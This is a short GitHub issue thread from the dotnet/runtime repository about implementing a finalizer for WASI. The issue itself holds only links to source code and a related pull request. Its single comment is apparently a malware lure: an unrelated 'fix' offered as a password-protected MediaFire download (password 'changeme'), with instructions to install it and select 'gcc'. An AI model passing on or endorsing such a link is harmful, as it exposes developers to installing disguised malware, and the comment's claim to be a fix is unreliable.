### ISSUE TITLE
[WASI] implement finalizer

### ISSUE THREAD

**Issue by pavelsavara** [dotnet/runtime#107071]
https://github.com/dotnet/runtime/blob/c1a9f26efa4fcf2e3fdcd8557da19d358f51eb00/src/mono/mono/metadata/gc.c#L697-L698

Related https://github.com/dotnet/runtimelab/pull/2634

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
